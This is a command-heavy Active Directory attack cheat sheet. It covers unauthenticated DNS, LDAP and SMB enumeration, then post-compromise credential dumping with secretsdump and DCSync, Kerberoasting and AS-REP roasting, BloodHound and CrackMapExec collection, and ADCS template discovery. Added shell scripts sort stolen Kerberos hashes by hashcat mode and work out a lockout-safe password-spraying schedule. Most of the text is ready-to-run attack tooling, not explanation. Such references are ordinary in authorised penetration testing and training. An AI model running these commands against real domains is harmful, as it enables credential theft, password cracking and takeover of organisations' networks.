Active Directory Enumeration
Non-Authenticated (External) Enumeration
DNS Reconnaissance
Purpose: Map domain infrastructure and discover services without credentials.
Zone Transfer Enumeration
# Standard zone transfer attempts
dig axfr @<DC-IP> <domain.com>
dnsrecon -d <domain.com> -t axfr
# Multiple DNS server attempts
for ns in $(dig +short NS <domain.com>); do
dig axfr @$ns <domain.com>
done
# Alternative zone transfer tools (the original Perl fierce took -dns; the maintained Python rewrite takes --domain)
fierce --domain <domain.com>
dnsenum <domain.com>
Requirements: DNS server must allow zone transfers (AXFR queries)
Use Case: When DNS servers are misconfigured to allow zone transfers to any client
SRV Record Discovery
# Active Directory specific SRV records
dig SRV _ldap._tcp.dc._msdcs.<domain.com>
dig SRV _kerberos._tcp.dc._msdcs.<domain.com>
dig SRV _gc._tcp.<domain.com>
dig SRV _ldap._tcp.pdc._msdcs.<domain.com>
dig SRV _kpasswd._tcp.<domain.com>
# Additional service discovery
dig SRV _sip._tcp.<domain.com>
dig SRV _xmpp-server._tcp.<domain.com>
dig SRV _autodiscover._tcp.<domain.com>
# Automated SRV enumeration (dns_srv_enum.py stands for your own wrapper script; it is not a published tool)
python3 dns_srv_enum.py -d <domain.com>
Requirements: Standard DNS query access to a resolver that hosts the AD zone (the DCs themselves, or internal resolvers that forward to them)
Use Case: Almost always works from inside the network - AD publishes these SRV records because clients need them to locate DCs, KDCs and the global catalog, so they cannot be turned off; they are rarely resolvable from the public internet, so an external-only position usually gets nothing here
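The SRV lookups above are usually run one record at a time. The script below is an added example, not code from the original page: it walks the full set of record names AD registers and orders each answer set the way a Windows client does (lowest priority first, then highest weight), which tells you which DC the site's clients actually talk to. The domain name and the sample `dig +short` answers are constructed; the record list is the standard set AD publishes.

```bash
#!/bin/sh
# Added example (not from the original page): enumerate the SRV records
# Active Directory registers for a domain and rank the answers the way a
# Windows client would: lowest priority first, then highest weight.
# The domain name and the sample answers below are assumptions/constructed.

# Record names AD registers under the domain; the global-catalog records
# (_gc._tcp, _ldap._tcp.gc._msdcs) live under the forest root domain.
AD_SRV_RECORDS="_ldap._tcp.dc._msdcs _kerberos._tcp.dc._msdcs _ldap._tcp.pdc._msdcs _gc._tcp _ldap._tcp.gc._msdcs _kpasswd._tcp _kerberos._udp"

# rank_srv: read "priority weight port target" lines (the `dig +short SRV`
# answer format) on stdin; print "target:port", best candidate first,
# with the trailing dot of the FQDN removed. Lines with other shapes are ignored.
rank_srv() {
    awk 'NF == 4 { sub(/\.$/, "", $4); print $1, $2, $4 ":" $3 }' |
        sort -k1,1n -k2,2nr |
        awk '{ print $3 }'
}

# srv_hosts RECORD DOMAIN: query one SRV name and rank the answers.
# Needs a resolver that hosts the AD zone (usually a DC).
srv_hosts() {
    dig +short SRV "$1.$2" | rank_srv
}

# enumerate_ad_srv DOMAIN: walk the whole list, printing "record host:port".
enumerate_ad_srv() {
    for rec in $AD_SRV_RECORDS; do
        srv_hosts "$rec" "$1" | while IFS= read -r hp; do
            printf '%s.%s %s\n' "$rec" "$1" "$hp"
        done
    done
}

# Constructed sample answers in `dig +short SRV` format (fake hosts):
# priority 0 beats priority 10; within priority 0, weight 200 beats 100.
SAMPLE_SRV='0 100 389 dc01.corp.example.
10 100 389 dc03-branch.corp.example.
0 200 389 dc02.corp.example.'

# Usage: ./ad_srv.sh corp.example   (live lookups)
#        ./ad_srv.sh --demo         (offline, ranks the constructed sample)
case "${1:-}" in
    --demo) printf '%s\n' "$SAMPLE_SRV" | rank_srv ;;
    '')     ;;
    *)      enumerate_ad_srv "$1" ;;
esac
```

The ranking matters for targeting: the host that comes out first for _ldap._tcp.dc._msdcs is the one most clients bind to, so it is where authentication noise from your enumeration blends in best and where session enumeration is richest.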
DNS Bruteforcing and Subdomain Discovery
# Subdomain enumeration
gobuster dns -d <domain.com> -w /usr/share/wordlists/subdomains.txt -t 50
subfinder -d <domain.com> -silent
amass enum -d <domain.com>
# Reverse DNS lookups (send the PTR queries to the internal resolver; nmap -sL only lists and resolves, it sends no probes to the hosts. Size the range deliberately: a /8 is 16 million lookups. Current nmap prints "Nmap scan report for name (ip)"; the old "not scanned" wording no longer appears)
dnsrecon -r 192.168.1.0/24 -n <DNS-server>
nmap -sL --dns-servers <DNS-server> 192.168.1.0/24 | grep "Nmap scan report for" | grep "(" | awk '{print $6, $5}' | tr -d '()' | sort -u
# DNS cache snooping (+norecurse: an answer in the ANSWER section means the resolver already had the record cached, i.e. an internal client resolved that name recently)
dig @<DNS-server> <target-domain> A +norecurse
Requirements: Network access to DNS servers
Use Case: Discovery of additional services, development environments, and forgotten subdomains
LDAP Enumeration
LDAP Anonymous Binding
Purpose: Extract directory information when anonymous access is permitted.
Anonymous LDAP Queries
# Test anonymous binding capabilities (the rootDSE is readable anonymously on every DC; -H ldap://host replaces the -h flag removed in OpenLDAP 2.5)
ldapsearch -x -H ldap://<DC-IP> -s base namingcontexts
ldapsearch -x -H ldap://<DC-IP> -s base defaultnamingcontext
# Extract base domain information
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=*)" -s base
# Anonymous user enumeration
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName description
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=person)" cn mail
# Anonymous group enumeration
ldapsearch -x -H ldap://<DC-IP> -b "DC=domain,DC=com" "(objectClass=group)" sAMAccountName member
Requirements: An anonymous bind always returns the rootDSE; reading objects under the domain naming context additionally needs anonymous LDAP operations enabled (7th character of the dsHeuristics attribute set to 2) and read ACLs granted to ANONYMOUS LOGON. An "Operations error" (result code 1, "a successful bind must be completed") on the user and group queries means the bind worked but anonymous reads are blocked, which is the default since Windows Server 2003
Use Case: Legacy environments, misconfigured LDAP servers, or intentionally open directories
Automated Anonymous LDAP Extraction
# Complete anonymous domain dump (omit -u/-p entirely: ldapdomaindump binds anonymously when no user is given)
ldapdomaindump <DC-IP>
ldapdomaindump <DC-IP> --no-html --no-json    # keep only the .grep files; all three output formats are on by default, and disabling all three produces nothing
# SMB/RPC null-session alternative (enum4linux talks to SMB and MSRPC, not LDAP; enum4linux-ng is the maintained rewrite with the same switches)
enum4linux -a <DC-IP>
enum4linux -U -G -S -P <DC-IP>
Requirements: Anonymous LDAP operations enabled (ldapdomaindump) or SMB null sessions permitted (enum4linux)
Use Case: When organizations maintain legacy compatibility or have misconfigured LDAP security
SMB/NetBIOS Enumeration
Purpose: Leverage SMB null sessions and NetBIOS for domain reconnaissance.
SMB Null Session Enumeration
# Basic SMB enumeration
smbclient -L //<DC-IP> -N
smbmap -H <DC-IP> -u '' -p ''
# RPC null session exploitation
rpcclient -U "" -N <DC-IP>
rpcclient> enumdomusers
rpcclient> enumdomgroups
rpcclient> querydominfo
rpcclient> querydispinfo
rpcclient> enumdomains
Requirements: SMB server allows null sessions (RestrictAnonymous = 0 and, for SAM user listing, RestrictAnonymousSAM = 0; EveryoneIncludesAnonymous = 1 widens what a null session may read)
Use Case: Windows 2000/2003 environments, or newer systems where the legacy settings were re-enabled; on a default Windows Server 2008+ DC the null bind or the enumdomusers call fails with NT_STATUS_ACCESS_DENIED
NetBIOS Information Gathering
# NetBIOS name resolution
nbtscan 192.168.1.0/24
nmblookup -A <target-IP>
# NetBIOS enumeration
enum4linux -n <DC-IP>
nmap -sU -p 137 --script nbstat <network-range>
# SNMP enumeration for NetBIOS/LanMan info (1.3.6.1.4.1.77.1.2.25 is the LanManager svUserTable: local user names)
snmpwalk -c public -v1 <DC-IP> 1.3.6.1.4.1.77.1.2.25
Requirements: NetBIOS over TCP/IP enabled; a readable SNMP community string if using SNMP (public is only the default guess)
Use Case: Internal network enumeration, legacy Windows environments
Authenticated (Post-Compromise) Enumeration
Complete Domain Structure Mapping
Purpose: Extract comprehensive AD objects and relationships for attack planning.
LDAP Domain Dump
# Complete authenticated domain extraction (HTML, JSON and .grep output are all produced by default; there are no --html/--json/--grep switches, only --no-* ones to turn a format off)
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP>
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> --no-html --no-json    # greppable output only
ldapdomaindump -u '<domain>\<username>' -p '<password>' <DC-IP> -o /tmp/domain_data/
# Alternative authentication methods (-d is the grep delimiter, not the domain; the domain travels in the user name)
ldapdomaindump -u '<username>@<domain.com>' -p '<password>' -at SIMPLE <DC-IP>    # simple bind with a UPN instead of the default NTLM bind
ldapdomaindump -u '<domain>\<username>' -p '<LM-hash>:<NT-hash>' <DC-IP>    # pass-the-hash: -p accepts LM:NT with the NTLM bind
Requirements: Valid domain credentials (user account)
Use Case: Post-credential compromise, comprehensive domain mapping for attack planning
Credential Material Extraction
Purpose: Harvest authentication material for lateral movement and privilege escalation.
NTDS.dit and Registry Hive Extraction
# Complete credential dump from a domain controller (over SMB: SAM, LSA secrets, cached credentials, then NTDS via DRSUAPI replication)
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP>
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP>
# NTDS only, via DCSync (-ntds takes an offline .dit file path; remote extraction of the directory alone is -just-dc)
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc -history
# Offline parsing of copied hives/NTDS (-sam/-security/-system/-ntds take file paths; LOCAL means no remote target)
python3 secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
python3 secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
# Registry hive secrets from a member server (remote SAM/LSA dump; needs local admin, and stops before NTDS because the host is not a DC)
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>
# Output formatting options
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -outputfile creds -just-dc-ntlm
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user <target-user>
Requirements: Local administrator on the target (hive dump), or DCSync rights on the domain for -just-dc: both "Replicating Directory Changes" and "Replicating Directory Changes All", which Domain Admins, Enterprise Admins and DC computer accounts hold by default
Use Case: When you have admin access to systems, or an account that was granted replication rights
Alternative Credential Extraction Methods
# Using different authentication methods (the target stays attached to the principal, user@host; -hashes takes LM:NT with an empty LM part allowed)
python3 secretsdump.py <domain>/<username>@<DC-IP> -hashes <LM-hash>:<NT-hash>
python3 secretsdump.py <domain>/<username>@<DC-IP> -aesKey <AES-key>
python3 secretsdump.py <domain>/<username>@<DC-IP> -k -no-pass
# Kerberos ticket-based authentication (target the DC by hostname so the service ticket name matches; -dc-ip/-target-ip supply the address when DNS does not)
export KRB5CCNAME=/tmp/krb5cc_ticket
python3 secretsdump.py <domain>/<username>@<dc-hostname.domain.com> -k -no-pass -dc-ip <DC-IP> -target-ip <DC-IP>
Requirements: Varies by method - a Kerberos ticket in a ccache, AES keys, or NTLM hashes
Use Case: When you have alternative authentication material but not plaintext passwords
Service Account Discovery and Analysis
Purpose: Identify service accounts for Kerberoasting and AS-REP roasting attacks.
Kerberoasting Enumeration
# Basic SPN enumeration (lists user accounts carrying a servicePrincipalName; no tickets are requested without -request)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP>
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -debug
# Request TGS tickets for cracking
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request-user <target-user>
# Output options (GetUserSPNs.py has no -format switch; the $krb5tgs$ lines are already hashcat/john input: mode 13100 for RC4, 19600/19700 for AES128/AES256)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile spns.txt
# Alternative authentication for Kerberoasting
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request
Requirements: Valid domain user credentials (any authenticated user may request a service ticket for any SPN)
Use Case: Always applicable with domain credentials - service accounts with human-chosen passwords are the usual target; accounts that only issue AES tickets are far more expensive to crack
AS-REP Roasting
# Find accounts without pre-authentication (authenticated LDAP search for the DONT_REQ_PREAUTH flag; nothing is requested from the KDC without -request)
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP>
# Unauthenticated: try each name in the list; the KDC returns an AS-REP only for accounts that exist and have pre-auth disabled
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass -format hashcat
# Request AS-REP hashes (-format hashcat gives mode 18200 for RC4; -format john for john)
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -format hashcat -outputfile asrep.txt
# Targeted AS-REP roasting
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -usersfile targets.txt
Requirements: Domain user credentials, or only a list of usernames for the unauthenticated variant
Use Case: When accounts have "Do not require Kerberos preauthentication" enabled; the usernames-only variant doubles as user enumeration, since unknown names fail with KDC_ERR_C_PRINCIPAL_UNKNOWN while existing ones fail with a pre-auth-required error
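Both roasting sections feed hashcat, and hashcat takes a single -m per run, so the usual failure is a mixed RC4/AES file in which half the lines are silently rejected. The script below is an added example, not code from the page or from Impacket: it classifies the $krb5tgs$ and $krb5asrep$ lines that GetUserSPNs.py and GetNPUsers.py emit by encryption type and writes one file per hashcat mode. The sample hashes are constructed (fake checksums, truncated ciphertext) and the output directory is an assumption.

```bash
#!/bin/sh
# Added example (not from the original page): split the output of
# GetUserSPNs.py / GetNPUsers.py into one file per hashcat mode. hashcat
# accepts a single -m per run, and mixed RC4/AES lines are a common reason
# a roast "cracks nothing". Sample hashes below are constructed, with fake
# checksums and truncated ciphertext; the output directory is an assumption.

# hashcat_mode LINE: print the hashcat mode for a Kerberos hash line,
# nothing for lines that are not recognised.
hashcat_mode() {
    case "$1" in
        '$krb5tgs$23$'*)                     echo 13100 ;;  # TGS-REP, RC4-HMAC (etype 23)
        '$krb5tgs$17$'*)                     echo 19600 ;;  # TGS-REP, AES128-CTS-HMAC-SHA1-96
        '$krb5tgs$18$'*)                     echo 19700 ;;  # TGS-REP, AES256-CTS-HMAC-SHA1-96
        '$krb5asrep$23$'*)                   echo 18200 ;;  # AS-REP, RC4-HMAC
        '$krb5asrep$17$'*|'$krb5asrep$18$'*) echo 32100 ;;  # AS-REP, AES (hashcat 6.2.6+)
    esac
}

# split_by_mode OUTDIR: read hash lines on stdin, append each to
# OUTDIR/<mode>.txt (or OUTDIR/unrecognised.txt), then print a sorted
# "<mode> <count>" summary so you know which -m runs are worth starting.
split_by_mode() {
    mkdir -p "$1"
    while IFS= read -r line || [ -n "$line" ]; do
        [ -n "$line" ] || continue
        mode=$(hashcat_mode "$line")
        printf '%s\n' "$line" >> "$1/${mode:-unrecognised}.txt"
    done
    for f in "$1"/*.txt; do
        [ -e "$f" ] || continue
        printf '%s %s\n' "$(basename "$f" .txt)" "$(wc -l < "$f" | tr -d ' ')"
    done | sort
}

# Constructed sample: two RC4 and one AES256 Kerberoast line, one RC4 AS-REP line.
SAMPLE_HASHES='$krb5tgs$23$*svc_sql$CORP.EXAMPLE$MSSQLSvc/sql01.corp.example:1433*$0123456789abcdef0123456789abcdef$00112233
$krb5tgs$18$svc_http$CORP.EXAMPLE$*HTTP/web01.corp.example*$00112233445566778899aabb$ccddeeff
$krb5asrep$23$legacyuser@CORP.EXAMPLE:0123456789abcdef0123456789abcdef$aabbccdd
$krb5tgs$23$*svc_backup$CORP.EXAMPLE$cifs/bk01.corp.example*$fedcba9876543210fedcba9876543210$44556677'

# Usage: split_by_mode /tmp/krb < spns.txt
#        hashcat -m 13100 /tmp/krb/13100.txt wordlist.txt   (one run per file)
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_HASHES" | split_by_mode /tmp/krb_demo
fi
```

Start with the 13100/18200 files: RC4 tickets crack orders of magnitude faster than the AES ones, and an account that still issues RC4 tickets is itself a finding worth reporting.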
Privilege Escalation Path Discovery
Purpose: Map AD relationships for privilege escalation opportunities.
BloodHound Data Collection
# Comprehensive collection (-ns is the DNS server to use, normally a DC; -c takes a comma-separated list)
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c all --zip
# Lower-noise collection (DCOnly talks only to the DC over LDAP and skips the per-host session and local-group queries; bloodhound-python has no --stealth switch, that belongs to SharpHound)
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c DCOnly
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Group,LocalAdmin
# Specific collection types
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Session,Group
bloodhound-python -u <username> -p <password> -ns <DC-IP> -d <domain.com> -c Trusts,Container
# Alternative authentication methods (there is no -dc-ip flag: -dc <hostname> pins the DC to query, -ns the resolver)
bloodhound-python --hashes :<NTLM-hash> -u <username> -d <domain.com> -ns <DC-IP> -dc <dc-hostname.domain.com> -c all
Requirements: Domain user credentials, network access to domain controllers and, for Session/LocalAdmin collection, SMB access to every member host
Use Case: Mapping complex privilege relationships, planning privilege escalation paths
Multi-Protocol Information Gathering
Purpose: Leverage multiple protocols for comprehensive enumeration.
CrackMapExec Enumeration
# SMB-based enumeration (crackmapexec is no longer maintained; NetExec, invoked as nxc, is the maintained fork with the same switches)
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --shares
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --sessions
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --disks
# LDAP-based enumeration
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --users
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --groups
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --admin-count
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --trusted-for-delegation
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --password-not-required
# Roasting through LDAP (both switches require an output file argument)
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --kerberoasting kerberoast.txt
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast asrep.txt
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --gmsa
# Network-wide enumeration (SMB sweeps make sense across a subnet; LDAP only answers on DCs, so list the DCs instead of sweeping a range)
crackmapexec smb 192.168.1.0/24 -u '<username>' -p '<password>' --shares
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --dc-list
Requirements: Valid domain credentials, network access to targets
Use Case: Network-wide enumeration, multi-protocol correlation, bulk operations
Password Policy and Account Lockout Analysis
# Extract password policies (--pass-pol is an SMB/SAMR option; over LDAP read the policy attributes from the domain root object)
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol
ldapsearch -x -H ldap://<DC-IP> -D '<username>@<domain.com>' -w '<password>' -b "DC=domain,DC=com" -s base minPwdLength pwdHistoryLength maxPwdAge minPwdAge lockoutThreshold lockoutDuration lockOutObservationWindow pwdProperties
# Fine-grained password policies (PSOs override the domain policy for the principals they apply to; by default only admins can read the container, so an empty result is not proof that none exist)
ldapsearch -x -H ldap://<DC-IP> -D '<username>@<domain.com>' -w '<password>' -b "CN=Password Settings Container,CN=System,DC=domain,DC=com" "(objectClass=msDS-PasswordSettings)" msDS-PasswordSettingsPrecedence msDS-LockoutThreshold msDS-LockoutObservationWindow msDS-PSOAppliesTo
Requirements: Domain user credentials
Use Case: Planning password attacks, understanding lockout thresholds
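What you do with the policy is compute how many guesses per account fit under the lockout threshold inside one observation window. The script below is an added example, not from the page: it parses the policy text into that budget. The sample policy is constructed in the layout polenum and --pass-pol print, the two-attempt safety margin is a choice rather than a rule, and the field names are an assumption to check against your tool's output.

```bash
#!/bin/sh
# Added example (not from the original page): turn a dumped password policy
# into a lockout-safe spraying budget. The policy text below is constructed
# in the layout polenum/--pass-pol print; field names are matched
# case-insensitively and may carry a tool prefix, adjust them if your tool
# labels them differently.

# to_minutes "41 days 23 hours 53 minutes": duration text -> integer minutes.
to_minutes() {
    printf '%s\n' "$1" | awk '{
        m = 0
        for (i = 1; i < NF; i++) {
            if ($(i + 1) ~ /^day/)    m += $i * 1440
            if ($(i + 1) ~ /^hour/)   m += $i * 60
            if ($(i + 1) ~ /^minute/) m += $i
        }
        print m
    }'
}

# spray_plan N: read policy lines on stdin and print, for N candidate
# passwords, how many attempts per observation window are safe (threshold
# minus a margin of 2 for the users' own typos), how many rounds that takes
# and the total wall-clock wait. Threshold 0 or "None" means no lockout.
spray_plan() {
    n="$1"; threshold=0; window=0
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in *:*) ;; *) continue ;; esac
        key=$(printf '%s' "${line%%:*}" | tr '[:upper:]' '[:lower:]' | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
        val=$(printf '%s' "${line#*:}" | sed 's/^[[:space:]]*//;s/[[:space:]]*$//')
        case "$key" in
            *'account lockout threshold')
                case "$val" in ''|*[!0-9]*) threshold=0 ;; *) threshold=$val ;; esac ;;
            *'reset account lockout counter')
                window=$(to_minutes "$val") ;;
        esac
    done
    if [ "$threshold" -eq 0 ]; then
        echo "threshold=0 window_min=$window per_window=unlimited rounds=1 total_min=0"
        return 0
    fi
    per=$((threshold - 2))
    if [ "$per" -le 0 ]; then
        echo "threshold=$threshold window_min=$window per_window=0 rounds=0 total_min=0 note=do-not-spray"
        return 0
    fi
    rounds=$(( (n + per - 1) / per ))
    echo "threshold=$threshold window_min=$window per_window=$per rounds=$rounds total_min=$(( (rounds - 1) * window ))"
}

# Constructed policy text (polenum/--pass-pol layout, values invented).
SAMPLE_POLICY='Minimum password length: 7
Password history length: 24
Maximum password age: 41 days 23 hours 53 minutes
Password Complexity Flags: 000001
Minimum password age: 1 day 4 minutes
Reset Account Lockout Counter: 30 minutes
Locked Account Duration: 30 minutes
Account Lockout Threshold: 5
Forced Log off Time: Not Set'

# Usage: crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --pass-pol | spray_plan 10
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_POLICY" | spray_plan 10
fi
```

The budget is per account, not per source host, and it assumes the domain policy applies; a PSO with a tighter threshold on the accounts you are spraying silently breaks the arithmetic, which is why the PSO query above matters even when it returns nothing.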
Security Identifier (SID) Analysis
Purpose: Enumerate objects through SID bruteforcing.
Comprehensive SID Enumeration
# Basic SID enumeration (resolves RIDs 500 up to maxRid through LSA LookupSids; the default maxRid is 4000)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP>
python3 lookupsid.py guest@<DC-IP> -no-pass
# Larger RID ceilings (the positional argument is a single maximum RID, not a range)
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 2000
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 5000
# Check whether you hit the ceiling: if the last RID printed is close to maxRid, the domain has more objects than you enumerated, so re-run with a higher value
python3 lookupsid.py <domain>/<username>:<password>@<DC-IP> 5000 | tail -1
Requirements: Valid credentials or guest/null access, RPC access to domain controllers
Use Case: Discovering hidden accounts, service accounts, and non-standard objects
Advanced LDAP Enumeration
Purpose: Perform targeted queries for specific attack vectors.
Windapsearch Enumeration
# Basic enumeration
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password>
# Privileged user discovery
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --da
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --privileged-users
# Delegation enumeration (there is no --constrained-users switch; constrained delegation is a custom filter on msDS-AllowedToDelegateTo)
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-users
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --unconstrained-computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --custom "(msDS-AllowedToDelegateTo=*)"
# Computer enumeration (no --dc switch either; domain controllers carry the SERVER_TRUST_ACCOUNT bit, 0x2000 = 8192, in userAccountControl)
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --computers
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> --custom "(userAccountControl:1.2.840.113556.1.4.803:=8192)"
# Custom LDAP queries
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
--custom "(&(objectClass=user)(servicePrincipalName=*))"
python3 windapsearch.py -d <domain.com> --dc-ip <DC-IP> -u <username> -p <password> \
--custom "(&(objectClass=computer)(operatingSystem=*Server*))"
Requirements: Domain user credentials, LDAP access to domain controllers
Use Case: Targeted enumeration for specific attack vectors, custom queries
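The custom filters above rely on the LDAP bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) against userAccountControl, and the values that come back are raw integers. The helper below is an added example, not from the page or from windapsearch: it builds those filters from flag names and decodes userAccountControl values in ldapsearch-style output back into flag names. The bit values are the documented userAccountControl flags; the sample entries are constructed.

```bash
#!/bin/sh
# Added example (not from the original page): build bitwise-AND LDAP filters
# on userAccountControl for windapsearch --custom / ldapsearch, and decode
# the integer values those tools print back into flag names. Flag values are
# the documented userAccountControl bits; the LDIF-style sample is constructed.

# Name and decimal value of the userAccountControl bits that matter offensively.
UAC_FLAGS='ACCOUNTDISABLE 2
PASSWD_NOTREQD 32
NORMAL_ACCOUNT 512
WORKSTATION_TRUST_ACCOUNT 4096
SERVER_TRUST_ACCOUNT 8192
DONT_EXPIRE_PASSWORD 65536
SMARTCARD_REQUIRED 262144
TRUSTED_FOR_DELEGATION 524288
NOT_DELEGATED 1048576
DONT_REQ_PREAUTH 4194304
TRUSTED_TO_AUTH_FOR_DELEGATION 16777216'

# uac_value NAME: decimal value of one flag (empty if unknown).
uac_value() {
    printf '%s\n' "$UAC_FLAGS" | awk -v n="$1" '$1 == n { print $2 }'
}

# uac_filter NAME [OBJECTCLASS]: LDAP filter matching objects with the bit
# set, via the LDAP_MATCHING_RULE_BIT_AND OID 1.2.840.113556.1.4.803.
uac_filter() {
    v=$(uac_value "$1")
    if [ -z "$v" ]; then
        echo "unknown flag: $1" >&2
        return 1
    fi
    printf '(&(objectClass=%s)(userAccountControl:1.2.840.113556.1.4.803:=%s))\n' "${2:-user}" "$v"
}

# uac_decode VALUE: comma-separated names of the known bits set in VALUE.
uac_decode() {
    out=""
    while read -r fname fbit; do
        [ $(( $1 & fbit )) -ne 0 ] && out="${out:+$out,}$fname"
    done <<EOF
$UAC_FLAGS
EOF
    printf '%s\n' "$out"
}

# uac_report: read "attr: value" ldapsearch output on stdin, one entry per
# blank-line-separated block, and print "<sAMAccountName> <decoded flags>".
uac_report() {
    name=""; uac=""
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            sAMAccountName:*)     name=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            userAccountControl:*) uac=$(printf '%s' "${line#*:}" | sed 's/^ *//') ;;
            '') if [ -n "$name" ] && [ -n "$uac" ]; then printf '%s %s\n' "$name" "$(uac_decode "$uac")"; fi
                name=""; uac="" ;;
        esac
    done
    if [ -n "$name" ] && [ -n "$uac" ]; then printf '%s %s\n' "$name" "$(uac_decode "$uac")"; fi
}

# Constructed ldapsearch-style output: a disabled AS-REP-roastable service
# account, and a DC (server trust account + unconstrained delegation).
SAMPLE_LDIF='dn: CN=svc_legacy,OU=Service Accounts,DC=corp,DC=example
sAMAccountName: svc_legacy
userAccountControl: 4260354

dn: CN=DC01,OU=Domain Controllers,DC=corp,DC=example
sAMAccountName: DC01$
userAccountControl: 532480'

# Usage: python3 windapsearch.py ... --custom "$(uac_filter DONT_REQ_PREAUTH)"
#        ldapsearch ... "$(uac_filter TRUSTED_FOR_DELEGATION computer)" sAMAccountName userAccountControl | uac_report
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_LDIF" | uac_report
fi
```

Decoding the whole value rather than testing one bit is what catches the svc_legacy case above: it is AS-REP roastable, but also disabled, so its AS-REP hash is worth cracking only if you expect the account to be re-enabled or its password reused elsewhere.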
Certificate Authority and PKI Discovery
Purpose: Enumerate PKI infrastructure for certificate-based attacks.
Certipy Enumeration
# Basic CA discovery
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP>
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -stdout
# Vulnerable template discovery
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerable
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -vulnerable -stdout
# Narrowing the collection (find has no -ca/-template switches; those belong to certipy req)
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -enabled -stdout
certipy find -u <username>@<domain.com> -p <password> -dc-ip <DC-IP> -dc-only
# Alternative authentication
certipy find -hashes :<NTLM-hash> -u <username>@<domain.com> -dc-ip <DC-IP>
Requirements: Domain user credentials, LDAP access to a DC and RPC/HTTP access to the CA host (-dc-only skips the CA and reads the template and CA objects from AD alone)
Use Case: When Active Directory Certificate Services (ADCS) is deployed; -vulnerable labels each template with the ESC misconfiguration class it matches
Application and Service Integration Discovery
Purpose: Identify integrated applications for additional attack surfaces.
Service-Specific Enumeration
# SQL Server discovery (SPN class MSSQLSvc; named instances on non-default ports show the port in the SPN)
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> | grep -i "mssql"
mssqlclient.py <domain>/<username>:<password>@<sql-server> -windows-auth
